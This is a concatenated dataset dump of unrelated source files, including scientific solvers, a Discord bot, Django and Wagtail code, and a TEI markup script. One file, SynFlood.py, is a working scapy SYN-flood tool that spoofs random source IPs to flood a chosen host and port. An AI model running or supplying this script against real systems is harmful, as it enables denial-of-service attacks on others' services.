+{"seq_id":"170135224","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n'''\nEste script es para resolver la ecuación de Newell-Whitehead-Segel\n'''\n\nfrom __future__ import division\nimport numpy as np\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\n\nnp.random.seed(555)\n\ndef inicializa_N(N, N_steps, h):\n    '''\n    Rellena N con las condiciones iniciales del problema.\n    Se asegura que las condiciones en los bordes sean uno y cero.\n    '''\n    N = np.random.uniform(low=-0.3, high=0.3, size=N_steps)\n\n    N[0] = 1\n    N[-1] = 0\n    return N\n\ndef calcula_b(b, N_steps, r, mu=1.5):\n    for j in range(1, N_steps - 1):\n        b[j] = r * N[j+1] + (1-2*r) * N[j] + r * N[j-1] + dt*mu*(N[j]-(N[j])**3)\n\n\ndef calcula_alpha_y_beta(alpha, beta, b, r, N_steps):\n    Aplus = -1 * r\n    Acero = (1 + 2 * r)\n    Aminus = -1 * r\n    alpha[0] = 0\n    beta[0] = 1 # viene de la condicion de borde T(t, 0) = 1 ¿?\n    for i in range(1, N_steps):\n        alpha[i] = -Aplus / (Acero + Aminus*alpha[i-1])\n        beta[i] = (b[i] - Aminus*beta[i-1]) / (Aminus*alpha[i-1] + Acero)\n\n\ndef avanza_paso_temporal(N, N_next, alpha, beta, N_steps, mu=1.5):\n    N_next[0] = 1\n    N_next[-1] = 0\n    for i in range(N_steps - 2, 0, -1):\n        N_next[i] =alpha[i] * N_next[i+1] + beta[i] # Crank-N\n\n# Main\n# setup\nN_steps = 501\nN_pasos_temporales = 1000\ngamma=0.001\n#mu=1.5\n\nh = 1 / (N_steps - 1)\ndt = 0.01\nr = (dt / 2 / h**2) * gamma\n\nN = np.zeros(N_steps)\nN_next = np.zeros(N_steps)\n\nb = np.zeros(N_steps)\nalpha = np.zeros(N_steps)\nbeta = np.zeros(N_steps)\n\nN = inicializa_N(N, N_steps, h)\n\n# Queremos guardar las soluciones en cada paso\nN_solucion = np.zeros((N_pasos_temporales, N_steps))\nN_solucion[0, :] = N.copy()\n\nfor i in range(1, N_pasos_temporales):\n    calcula_b(b, N_steps, r)\n    calcula_alpha_y_beta(alpha, beta, b, r, N_steps)\n    
avanza_paso_temporal(N, N_next, alpha, beta, N_steps)\n N = N_next.copy()\n N_solucion[i, :] = N.copy()\n\n\n# Plots\n\n# PLOT 1\n\nx = np.linspace(0, 1, N_steps)\n\nfig = plt.figure(1)\nfig.clf()\nax = fig.add_subplot(111)\n\nfor i in range(0, N_pasos_temporales, 10):\n ax.plot(x, N_solucion[i, :],'r')\n#ax.set_ylim(0, 1)\n\nplt.xlabel('Posicion')\nplt.ylabel(r'$n(x,t)$')\nplt.title(r\"$n$ en funcion de la posicion entre t = 0 y t = 10\")\nplt.savefig(\"2imagen_1\")\n#Plot 2\n\nfig2 = plt.figure(2)\nfig2.clf()\nax2 = fig2.add_subplot(111)\nfrom matplotlib.collections import LineCollection\nline_segments = LineCollection([list(zip(x, ys)) for ys in N_solucion],\n linewidths=(0.5, 1, 1.5, 2),\n linestyles='solid')\nline_segments.set_array(x)\nax2.add_collection(line_segments)\nfig2 = plt.gcf()\nplt.sci(line_segments)\n\nplt.xlabel('Posicion')\nplt.ylabel(r'$n(x,t)$')\nplt.title(r\"$n$ en funcion de la posicion entre t = 0 y t = 10\")\nplt.ylim(-1,1)\nplt.savefig(\"2imagen_2\")\n\n# PLOT 3\n# usar el plano x, t y plotear N en la 3a dimension\n\nfig3 = plt.figure(3)\nfig3.clf()\nax3 = fig3.add_subplot(111)\ny = np.arange(0, N_pasos_temporales) * dt\nX, Y = np.meshgrid(x, y)\nax3.pcolormesh(X, Y, N_solucion)\n\n\nplt.xlabel('Posicion')\nplt.ylabel('Tiempo')\nplt.title(r\"Plano Posicion-Tiempo con $n(x,t)$ en la tercera dimension\")\nplt.savefig(\"2imagen_3\")\nplt.show()\nplt.draw()\n","sub_path":"Solution_to_Newell-Whitehead-Segel.py","file_name":"Solution_to_Newell-Whitehead-Segel.py","file_ext":"py","file_size_in_byte":3220,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"441931243","text":"import numpy\nfrom numpy import array, cross, dot, sqrt\nfrom datetime import datetime, timezone\nfrom numpy.linalg import norm\n\n# read STK file (rough probably)\ndef read_STK(filename):\n '''Read and parse an STK ECEF satellite position file (assumes data directory)\n ----------------------------------------------------------------------------\n Inputs:\n --------\n `filename` -- string with the file name\n \n Returns:\n --------\n `data` -- dictionary containing the STK file info\n '''\n\n data_dir = '/Users/rockm/Documents/CU_Boulder/ASEN_4018/Software/'\n \n # create dictionary\n data = {\n 'Time': [],\n 'r_vec': [],\n 'r_mag': [],\n }\n \n # month dictionary\n month = {\n 'Jan': 1,\n 'Feb': 2,\n 'Mar': 3,\n 'Apr': 4,\n 'May': 5,\n 'Jun': 6,\n 'Jul': 7,\n 'Aug': 8,\n 'Sep': 9,\n 'Oct': 10,\n 'Nov': 11,\n 'Dec': 12\n }\n \n # parse data\n with open(data_dir + filename, 'r') as file:\n lines = list(file.readlines())\n for i, line in enumerate(lines):\n if (i >= 7):\n Line = line.split()\n\n # Time stuff\n year = int(Line[2])\n day = int(Line[0])\n hour = int(Line[3][0:2])\n minute = int(Line[3][3:5])\n # can add seconds here once we start caring about them\n\n # Space stuff\n x = float(Line[4]) \n y = float(Line[5])\n z = float(Line[6])\n r_vec = array([x, y, z])\n r_mag = float(Line[7]) # magnitude of position vector\n\n # append Time and Space to the data dictionary's lists\n data['Time'].append(datetime(year, month[Line[1]], day, hour, minute, tzinfo=timezone.utc))\n data['r_vec'].append(r_vec)\n data['r_mag'].append(r_mag)\n data['r_vec'] = array(data['r_vec'])\n \n return data\n\n# Gibb's Method \ndef Gibby(r_vec, r_mag, mu):\n '''Use Gibb's Method to produce a velocity vector from three consecutive\n position vectors.\n ----------------------------------------------------------------------------\n Inputs:\n --------\n `r_vec` -- numpy 
array of three consecutive (in time) position vectors (3,3) [km]\n    `r_mag` -- list of corresponding vector magnitudes [km]\n    `mu` -- Standard Gravitational Parameter of the central body [km**3 / s**2]\n    \n    Returns:\n    --------\n    `v_vec` -- velocity vector (numpy array) at the second position vector's \n               time (1,3) [km/s]\n    `coplanar_val` -- dot product of unit vectors that should be coplanar for Gibb's\n                      Method to work properly [~] (closer to zero is better)\n    '''\n    \n    # compute unit vectors\n    C_01 = cross(r_vec[0], r_vec[1]) / norm(cross(r_vec[0], r_vec[1]))\n    C_12 = cross(r_vec[1], r_vec[2]) / norm(cross(r_vec[1], r_vec[2]))\n    C_20 = cross(r_vec[2], r_vec[0]) / norm(cross(r_vec[2], r_vec[0]))\n    \n    # check how coplanar the position vectors are\n    coplanar_val = dot((r_vec[0] / r_mag[0]), C_12)\n    \n    # calculate N, D, and S\n    N = r_mag[0] * cross(r_vec[1], r_vec[2]) + r_mag[1] * cross(r_vec[2], r_vec[0]) + r_mag[2] * cross(r_vec[0], r_vec[1])\n    D = cross(r_vec[0], r_vec[1]) + cross(r_vec[1], r_vec[2]) + cross(r_vec[2], r_vec[0])\n    S = r_vec[0] * (r_mag[1] - r_mag[2]) + r_vec[1] * (r_mag[2] - r_mag[0]) + r_vec[2] * (r_mag[0] - r_mag[1])\n    \n    # calculate velocity vector at second position vector\n    v_vec = sqrt(mu / (norm(N) * norm(D))) * ((cross(D, r_vec[1]) / r_mag[1]) + S)\n    \n    return v_vec, coplanar_val","sub_path":"gibbs.py","file_name":"gibbs.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"74221949","text":"from utils import load_data_with_pickle, save_data_with_pickle\n\nPICKLES_PATH = '../../source_files/pickles/'\n\ncorpus = load_data_with_pickle(PICKLES_PATH + 'corpus')\n\n\ndef find(word_to_index):\n    word_indexes = {}\n    line_index = 0\n    for sentence in corpus[:500]:\n        for word_i, word in enumerate(sentence):\n            if word in word_to_index:\n                try:\n                    word_indexes[word].append([line_index, word_i])\n                except:\n                    word_indexes[word] = [[line_index, word_i]]\n\n        line_index += 1 \n    return word_indexes\n\n\n","sub_path":"preprocessing/parallel_script.py","file_name":"parallel_script.py","file_ext":"py","file_size_in_byte":586,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"203948564","text":"import os\r\nimport discord\r\nimport json\r\nimport random\r\nimport time\r\nimport asyncpg\r\nimport asyncio\r\nfrom discord.ext import commands\r\n\r\ndef get_prefix(client, message):\r\n    with open('prefixes.json', 'r')as f:\r\n        prefixes = json.load(f)\r\n\r\n    return prefixes[str(message.guild.id)]\r\n\r\nclient = commands.Bot(command_prefix = '.', case_insensitive = True)\r\nclient.remove_command('help')\r\n\r\n@client.event\r\nasync def on_ready():\r\n    await client.change_presence(activity=discord.Activity(type=discord.ActivityType.playing, name='with commands | .help'))\r\n    print('Bot is online!')\r\n@client.event\r\nasync def on_command_error(ctx, error):\r\n    if isinstance(error, commands.CommandNotFound):\r\n        await ctx.send('Command wasn\\'t found, make sure the command exists and check if it is spelled correctly.') \r\n        \r\n\r\n    \r\n\r\n        \r\n@client.event\r\nasync def on_guild_join(guild):\r\n    with open('prefixes.json', 'r') as f:\r\n        prefixes = json.load(f)\r\n\r\n    prefixes [str(guild.id)] = '.'\r\n\r\n    with open('prefixes.json', 'w') as f:\r\n        json.dump(prefixes, f, indent = 4)\r\n    \r\n\r\n@client.event\r\nasync def on_guild_remove(guild):\r\n    with open('prefixes.json', 'r') as f:\r\n        prefixes = json.load(f)\r\n\r\n    
prefixes.pop(str(guild.id))\r\n\r\n with open('prefixes.json', 'w') as f:\r\n json.dump(prefixes, f, indent = 4)\r\n\r\nfor filename in os.listdir('./cogs'):\r\n if filename.endswith('.py'):\r\n client.load_extension(f'cogs.{filename[:-3]}')\r\n \r\n\r\n \r\n\r\n\r\nclient.run(os.environ['TOKEN'])\r\n","sub_path":"bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"568993803","text":"from django.urls import path, include\nfrom pdds.views import index, getClientes, getTransportistas, getProductos, estadoPedido, ubicacionPedido, setPedido, setTipoCliente\nfrom django.contrib.auth.decorators import login_required\n\napp_name = 'pedidos'\n\nurlpatterns = [\n path('', login_required(index), name = 'index'),\n path('getClientes', getClientes),\n path('getTransportistas', getTransportistas),\n path('getProductos', getProductos),\n path('estadoPedido/', estadoPedido),\n path('ubicacionPedido/', ubicacionPedido),\n path('setPedido', setPedido),\n path('setTipoCliente',login_required(setTipoCliente), name='setTipoCliente' ),\n\n]\n","sub_path":"Semana13Hackaton/rpineda/whtsppPedidos/pdds/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"231958969","text":"from __future__ import absolute_import, unicode_literals\n\nfrom django.core.cache import cache\nfrom django.test import TestCase\n\nfrom wagtail.tests.testapp.models import EventIndex, SimplePage\nfrom wagtail.wagtailcore.models import Page, PageViewRestriction, Site\n\nfrom .sitemap_generator import Sitemap\n\n\nclass TestSitemapGenerator(TestCase):\n def setUp(self):\n self.home_page = Page.objects.get(id=2)\n\n self.child_page = self.home_page.add_child(instance=SimplePage(\n title=\"Hello world!\",\n slug='hello-world',\n content=\"hello\",\n live=True,\n ))\n\n self.unpublished_child_page = self.home_page.add_child(instance=SimplePage(\n title=\"Unpublished\",\n slug='unpublished',\n content=\"hello\",\n live=False,\n ))\n\n self.protected_child_page = self.home_page.add_child(instance=SimplePage(\n title=\"Protected\",\n slug='protected',\n content=\"hello\",\n live=True,\n ))\n PageViewRestriction.objects.create(page=self.protected_child_page, password='hello')\n\n self.site = Site.objects.get(is_default_site=True)\n\n def test_get_pages(self):\n sitemap = Sitemap(self.site)\n pages = sitemap.get_pages()\n\n self.assertIn(self.child_page.page_ptr, pages)\n self.assertNotIn(self.unpublished_child_page.page_ptr, pages)\n self.assertNotIn(self.protected_child_page.page_ptr, pages)\n\n def test_get_urls(self):\n sitemap = Sitemap(self.site)\n urls = [url['location'] for url in sitemap.get_urls()]\n\n self.assertIn('http://localhost/', urls) # Homepage\n self.assertIn('http://localhost/hello-world/', urls) # Child page\n\n def test_get_urls_uses_specific(self):\n # Add an event page which has an extra url in the sitemap\n self.home_page.add_child(instance=EventIndex(\n title=\"Events\",\n slug='events',\n live=True,\n ))\n\n sitemap = Sitemap(self.site)\n urls = [url['location'] for url in sitemap.get_urls()]\n\n self.assertIn('http://localhost/events/', urls) # Main view\n self.assertIn('http://localhost/events/past/', urls) # Sub view\n\n def test_render(self):\n sitemap = Sitemap(self.site)\n xml = sitemap.render()\n\n # Check that a URL has made it into the xml\n 
self.assertIn('http://localhost/hello-world/', xml)\n\n # Make sure the unpublished page didn't make it into the xml\n self.assertNotIn('http://localhost/unpublished/', xml)\n\n # Make sure the protected page didn't make it into the xml\n self.assertNotIn('http://localhost/protected/', xml)\n\n\nclass TestSitemapView(TestCase):\n def test_sitemap_view(self):\n response = self.client.get('/sitemap.xml')\n\n self.assertEqual(response.status_code, 200)\n self.assertTemplateUsed(response, 'wagtailsitemaps/sitemap.xml')\n self.assertEqual(response['Content-Type'], 'text/xml; charset=utf-8')\n\n def test_sitemap_view_cache(self):\n cache_key = 'wagtail-sitemap:%d' % Site.objects.get(is_default_site=True).id\n\n # Check that the key is not in the cache\n self.assertNotIn(cache_key, cache)\n\n # Hit the view\n first_response = self.client.get('/sitemap.xml')\n\n self.assertEqual(first_response.status_code, 200)\n self.assertTemplateUsed(first_response, 'wagtailsitemaps/sitemap.xml')\n\n # Check that the key is in the cache\n self.assertIn(cache_key, cache)\n\n # Hit the view again. Should come from the cache this time\n second_response = self.client.get('/sitemap.xml')\n\n self.assertEqual(second_response.status_code, 200)\n self.assertTemplateNotUsed(second_response, 'wagtailsitemaps/sitemap.xml') # Sitemap should not be re rendered\n\n # Check that the content is the same\n self.assertEqual(first_response.content, second_response.content)\n","sub_path":"wagtail/contrib/wagtailsitemaps/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":3993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"42788177","text":"from ipywidgets import interact, interactive, fixed, interact_manual\nfrom ipywidgets import widgets,Layout\n\nclass TextAreaWithButton:\n def __init__(self, Func=None,Name=\"textArea\",FunctionName=\"Button\", BufferSize=10000,height='500px'): \n l = Layout(flex='0 1 auto', height=height, min_height='40px', width='auto')\n self.BufferSize=BufferSize\n self.tba = widgets.Textarea(\n value='',\n placeholder='Type something',\n description=Name,\n disabled=False,\n layout=l\n )\n self.button = widgets.Button(description=FunctionName)\n self.Func = Func\n \n self.button.on_click(self.pressButton)\n\n \n def __call__(self, textUpdate):\n dummy = self.tba.value + textUpdate\n self.tba.value = dummy[-self.BufferSize:]\n \n def setFunction(self,Func):\n self.Func = Func\n \n def Display(self):\n display(self.button)\n display(self.tba)\n \n def pressButton(self,x):\n self.tba.value = \"\"\n self.Func()\n \n ","sub_path":"Jupyter_helpers/TextAreaWithButton.py","file_name":"TextAreaWithButton.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"53696679","text":"from abc import abstractmethod\nfrom typing import Generator\nfrom nboost.helpers import count_lines\nfrom nboost.logger import set_logger\nfrom nboost import PKG_PATH\nfrom pathlib import Path\nfrom tqdm import tqdm\nimport csv\n\n\nclass BaseIndexer:\n \"\"\"An object that sends a csv to a given search api.\"\"\"\n\n def __init__(self, file: str, name: str = 'nboost', id_col: int = 0,\n field_col: int = 1, field_name: str = 'passage',\n host: str = '0.0.0.0', port: int = 9200, delim: str = '\\t',\n shards: int = 3, verbose: bool = False, **_):\n \"\"\"\n :param name: name of the index\n :param id_col: column number of the id\n :param field_col: column number of the field 
data\n :param field_name: name of the field\n :param host: host of the search api server\n :param port: port the the server\n :param shards: number of shards for the index\n \"\"\"\n self.file = file\n self.name = name\n self.id_col = id_col\n self.field_col = field_col\n self.field_name = field_name\n self.host = host\n self.port = port\n self.delim = delim\n self.shards = shards\n self.logger = set_logger(self.__class__.__name__, verbose=verbose)\n\n def csv_generator(self) -> Generator:\n \"\"\"yield the `--id_col` and `--field_col` from the `--file` csv\"\"\"\n pkg_path = PKG_PATH.joinpath('resources').joinpath(self.file)\n cwd_path = Path().joinpath(self.file).absolute()\n\n if pkg_path.exists():\n path = pkg_path\n elif cwd_path.exists():\n path = cwd_path\n else:\n self.logger.error('Could not find %s or %s', pkg_path, cwd_path)\n raise SystemExit\n\n self.logger.info('Estimating completion size...')\n num_lines = count_lines(path)\n with path.open() as file:\n with tqdm(total=num_lines, desc=path.name) as pbar:\n for line in csv.reader(file, delimiter=self.delim):\n pbar.update()\n yield line[self.id_col], line[self.field_col]\n\n @abstractmethod\n def index(self):\n \"\"\"send the csv to the index\"\"\"\n","sub_path":"nboost/indexer/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"503633356","text":"from lxml import etree\nimport re\nimport os\nfrom prereform2modern import Processor\n\ndef markup_choices_for_editorial_corrections(text):\n choice_pattern = re.compile(\n r'([*, ]*)?(\\s*(\\w*?(\\[(.*?)\\])\\w*)\\s*)(?!\\\">)()?'\n # r'(]*?>[*, ]*)?(\\s*(\\w*?(\\[(.*?)])\\w*)\\s*)(?!\\\">)()?'\n )\n illegible_pattern = re.compile( # решить, что с этим делать\n r'(\\[\\d+.*?не\\s*разобр.*?\\])|' # [2 неразобр.]\n # вл[иянием?]\n r'(\\[\\?\\])' # [?]\n )\n crossed_out_pattern = re.compile(\n # r'(<.*?>)?(з|З)ач(е|ё)ркнуто:(<.*?>)?'\n r'(<[^>]*?>)?(з|З)ач(е|ё)ркнуто:(<[^>]*?>)?'\n )\n choice_result = re.findall(choice_pattern, text)\n\n for i in choice_result:\n if (\n i[0] or # if inside head\n illegible_pattern.search(i[2]) is not None or\n crossed_out_pattern.search(i[2]) is not None\n ):\n continue\n elif re.search(r'(\\w*\\[\\w+\\?\\s*\\])', i[2]):\n sub_1 = re.sub(r'\\[|\\]', r'', i[2])\n sub_2 = re.sub(r'\\[|\\(', r'\\\\[', i[2])\n sub_3 = re.sub(r'\\]|\\)', r'\\\\]', sub_2)\n sub_3 = re.sub(\"\\?\", \"\\?\", sub_2)\n sub_4 = re.sub('\\[.*?\\]', '', i[2])\n sub_4 = re.sub(\"\\?\", \"\", sub_4)\n choice_attribute = re.search('<.*?>(.*?)<.*?>', i[2]) # [хвастовство]\n if choice_attribute is None:\n choice_attribute = i[2]\n else:\n choice_attribute = choice_attribute.group(1)\n replacement = (f''\n f'{sub_4}{sub_1}')\n reg_for_repl = f'(?)'\n text = re.sub(reg_for_repl, replacement, text)\n continue\n sub_1 = re.sub(r'\\[|\\]', r'', i[2])\n sub_2 = re.sub(r'\\[|\\(', r'\\\\[', i[2])\n sub_3 = re.sub(r'\\]|\\)', r'\\\\]', sub_2)\n sub_4 = re.sub('\\[.*?\\]', '', i[2])\n choice_attribute = re.search('<.*?>(.*?)<.*?>', i[2]) # [хвастовство]\n if choice_attribute is None:\n choice_attribute = i[2]\n else:\n choice_attribute = choice_attribute.group(1)\n replacement = (f''\n f'{sub_4}{sub_1}')\n reg_for_repl = f'(?)'\n text = re.sub(reg_for_repl, replacement, text)\n return text\n\n\n\ndef markup_choices_for_prereform_spelling(text):\n split_pattern = re.compile(r'(.*?)')\n # rus_pattern = re.compile(r'[а-яА-Я\\n ]')\n tokens = split_pattern.split(text)\n # 
print(tokens)\n    # print(len(tokens))\n    for i, token in enumerate(tokens):\n        if split_pattern.search(token) is not None:\n            \n            corr_pattern = r'(.*?)'\n            matchobj = re.search(corr_pattern, token)\n            if not matchobj: \n                matchobj = re.search(r'(.*?)', token)\n            to_corr = matchobj.group(2)\n            text_res, changes, s_json = Processor.process_text(\n                text=to_corr,\n                show=True,\n                delimiters=['', '', ''],\n                check_brackets=False\n            )\n            tokens[i] = f'{text_res}'\n        else:\n            in_head_pattern = r'].*?>\\[.*?\\]' # Иначе странно себя ведет\n            if re.search(in_head_pattern, token) is not None:\n                continue # Иначе [II.] -> \n            text_res, changes, s_json = Processor.process_text(\n                text=token,\n                show=True,\n                delimiters=['', '', ''],\n                check_brackets=False\n            )\n            tokens[i] = text_res\n            # print('token', token, '\\nresult', text_res)\n    # print(tokens)\n    return ''.join(tokens)\n\n    \ndef q_mark_correction(text:str):\n    '''функция для разметки редакторских сокращений со знаком вопроса такого вида:\n    ко[торого?]'''\n    pattern = re.compile(r'([*, ]*)?(\\s*(\\w+?(\\[[^<\\[]+?\\?\\])\\w*)\\s*)(?!\\\">)()?')\n    choice_result = re.findall(pattern, text)\n    for result in choice_result:\n        sub_1 = re.escape(result[2])\n        sub_2 = re.sub('\\[.*?\\]', '', result[2])\n        sub_3 = re.sub(r'\\[|\\]|\\?', r'', result[2])\n\n        replacement = (f''\n                       f'{sub_2}{sub_3}')\n        reg_for_repl = f'(?)'\n        #print(reg_for_repl)\n        #print(replacement)\n        \n        text = re.sub(reg_for_repl, replacement, text)\n\n    return text    \n    \ndef editor_changes(text:str):\n    #убрать все пропуски между тегами\n    text = re.sub(\"\\s{2,}|\\n\", \"\", text) \n    # паттерн для примечаний, где слово Зачеркнуто выделено тегом hi\n    # Здесь есть вопрос: ([^>]+?) - мне нужно, чтобы в середине выражения матчилась и слова и теги ,\n    # но не никакой другой открывающийся тег\n    pattern_hi = re.compile(\"(]*?>]*?>]*?>[^<]+?]*?>)]*?>(Зач\\.[:;]|Зач[её]ркнуто[:;])(.*?(?=</hi>))(</hi>.*?)\")\n\n    text = pattern_hi.sub(\"\\g<1>\\g<3>\\g<4>\", text)\n\n    \n    # [?] перед квадратными скобками\n    text = re.sub(\"\\s([^\\s^<>]+?)\\s+\\[\\?\\]\", \"\\g<1>\", text)\n    # [?] перед словом в тегах редакторской коррекции\n    text = re.sub(\"(([^<]+?|)[^<]+?
)\\s+\\[\\?\\]\", \"\\g<1>\", text)\n # [?] перед словом в тегах дореволюционной орфографии\n text = re.sub(\"([^<>]+?[^<>]+?)\\s+\\[\\?\\]\", \"\\g<1>\", text)\n # для [1 неразбор.]\n text = re.sub(\"\\[([0-9])\\s*не\\s*разобр\\.\\]\", \"\", text)\n text = q_mark_correction(text)\n return text\ndef change_editor_notes(file:str):\n tree = etree.parse(file)\n root = tree.getroot()\n text = etree.tostring(root, pretty_print=True, encoding=\"unicode\")\n text = editor_changes(text)\n root = etree.fromstring(text)\n for note in root.findall(\".//{http://www.tei-c.org/ns/1.0}note\"):\n # для примечаний в самом теге note\n\n if note.text is not None:\n if re.search(\"([Зз]ач\\.[:;]|Зач[её]ркнуто[:;])\\s*(.+)\", note.text):\n note.text = markup_choices_for_editorial_corrections(note.text)\n note.text = markup_choices_for_prereform_spelling(note.text)\n\n note.text = re.sub(\"([Зз]ач\\.[:;]|Зач[её]ркнуто[:;])\\s*(.+)\", \"\\g<2>\", note.text)\n \n else:\n # для примечаний в тегах p\n for p in note.findall(\".//{http://www.tei-c.org/ns/1.0}p\"):\n \n if p.text is not None:\n if re.search(\"([Зз]ач\\.[:;]|Зач[её]ркнуто[:;])\\s*(\\w+)\", p.text):\n p.text = markup_choices_for_editorial_corrections(p.text)\n p.text = markup_choices_for_prereform_spelling(p.text)\n p.text = re.sub(\"([Зз]ач\\.[:;]|Зач[ёе]ркнуто[:;])\\s*(.+)\", \"\\g<2>\", p.text)\n p.text = re.sub(\"<(.+?)>\", \"\\g<1>\", p.text)\n \n Element_tree = etree.ElementTree(root)\n Element_tree.write(file, encoding = \"utf-8\", xml_declaration=True, pretty_print=True)\ndef pipline():\n path = \"/content/TEI/files_with_updated_headers\"\n folders = os.listdir(path)\n for folder in folders:\n new_path = f\"{path}/{folder}\"\n files = os.listdir(new_path)\n os.chdir(new_path)\n for file in files:\n change_editor_notes(file)\nif __name__ == \"__main__\":\n pipline() \n","sub_path":"utils/editor_corr.py","file_name":"editor_corr.py","file_ext":"py","file_size_in_byte":8731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"336372049","text":"__author__ = 'adamhoward'\n# Find the initial number under one million which produces the longest Collatz sequence\n\n\ndef hailstone(num):\n count = 1\n while num > 1:\n if num % 2 == 0:\n num = num / 2\n else:\n num = (num * 3) + 1\n count += 1\n return count\n\nlargestSeq = 0\nlargestStart = 0\nstart = 1\nwhile start < 1000000:\n temp = hailstone(start)\n # print(temp)\n if temp > largestSeq:\n largestSeq = temp\n largestStart = start\n start += 1\n\nprint(largestStart)\n","sub_path":"Problem 14.py","file_name":"Problem 14.py","file_ext":"py","file_size_in_byte":531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"314928726","text":"f=open('pinglog.txt','r')\r\nmyfile=f.read()\r\nf.close()\r\nmystr=myfile.split('\\n')\r\ns=False\r\ne=False\r\nfor x in range(0,len(mystr)):\r\n if ('False' in mystr[x]) and (s==False):\r\n s=mystr[x][0:20]\r\n if ('False' not in mystr[x]) and (s!=False):\r\n e=mystr[x-1][0:20]\r\n print(s[0:10],' ', s[11:-1],'-', e[11:-1], ' ', mystr[x-1][20:])\r\n s=False\r\n","sub_path":"My Pythons/mycompressor.py","file_name":"mycompressor.py","file_ext":"py","file_size_in_byte":374,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"570196809","text":"# coding: utf-8\n# Copyright 2013 The Font Bakery Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n# See AUTHORS.txt for the list of Authors and LICENSE.txt for the License.\nimport fnmatch\nimport os\n\nfrom fontcrunch import fontcrunch\n\nfrom bakery_cli.system import shutil\n\n\nclass FontCrunch(object):\n\n def __init__(self, bakery):\n self.project_root = bakery.project_root\n self.builddir = bakery.build_dir\n self.bakery = bakery\n\n def run(self, filename, pipedata):\n if not pipedata.get('fontcrunch'):\n return # run fontcrunch only if user set flag in config\n filename = os.path.join(self.builddir, filename)\n self.bakery.logging_raw('### Fontcrunch {}\\n'.format(filename))\n\n fontcrunch.optimize(filename, '{}.crunched'.format(filename))\n shutil.move('{}.crunched'.format(filename), filename)\n return 1\n\n def execute(self, pipedata):\n if not pipedata.get('fontcrunch'):\n return # run fontcrunch only if user set flag in config\n task = self.bakery.logging_task('Fontcrunch TTF')\n if self.bakery.forcerun:\n return\n\n try:\n for filename in [os.path.join(self.builddir, x) \\\n for x in pipedata['bin_files']]:\n self.run(filename, pipedata)\n self.bakery.logging_task_done(task)\n except:\n self.bakery.logging_task_done(task, failed=True)\n raise\n","sub_path":"bakery_cli/pipe/font_crunch.py","file_name":"font_crunch.py","file_ext":"py","file_size_in_byte":1992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"494753596","text":"from __future__ import print_function\nimport sys, socket, random, threading\nfrom scapy.all import *\n\n\nclass SynFlood (threading.Thread):\n def __init__(self, host, port):\n threading.Thread.__init__(self)\n\n self.host = host\n self.port = port\n\n def run(self):\n ip = IP()\n ip.src = \"%d.%d.%d.%d\" % (random.randint(1,254), random.randint(1,254), random.randint(1,254), random.randint(1,254))\n ip.dst = self.host\n\n tcp = TCP()\n tcp.sport = random.randint(1, 65535)\n tcp.dport = self.port\n tcp.flags = \"S\"\n\n send(ip/tcp, verbose=0)\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 3:\n print (\"[!] Usage: python\", __file__, \" \")\n sys.exit(0)\n\n try:\n host = sys.argv[1]\n socket.inet_aton(host)\n except socket.error:\n print (\"[!] IP missing!\")\n sys.exit(0)\n\n try:\n port = int(sys.argv[2])\n except ValueError:\n print (\"[!] Port missing!\")\n sys.exit(0)\n\n total = 0\n conf.iface = \"en0\"\n try:\n while True:\n SynFlood(host, port).run()\n total += 1\n print (\"Packets sent:\\t\\t%d\" % total, end='\\r')\n except KeyboardInterrupt:\n print (\"\\n[!] 
Exiting...\")\n sys.exit(0)","sub_path":"DoS/SynFlood.py","file_name":"SynFlood.py","file_ext":"py","file_size_in_byte":1286,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"593509056","text":"from openpyxl import load_workbook\nimport datetime\n\ninput_file=\"inputs/in_data.xlsx\"\noutput_file=\"outputs/out_data.xlsx\"\n\nwb = load_workbook(filename=input_file)\nws = wb.active\n\nws.delete_cols(5, 3)\nwb.save(filename=output_file)\n","sub_path":"python/openpyxl/read-n-write.py","file_name":"read-n-write.py","file_ext":"py","file_size_in_byte":229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"624183799","text":"from django.contrib.auth.mixins import LoginRequiredMixin,\\\n PermissionRequiredMixin\nfrom django.contrib.auth.decorators import login_required, permission_required\nfrom django.contrib.auth.models import Group\nfrom django.contrib.auth import get_user_model\nfrom django.contrib.sites.models import Site\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.template.loader import 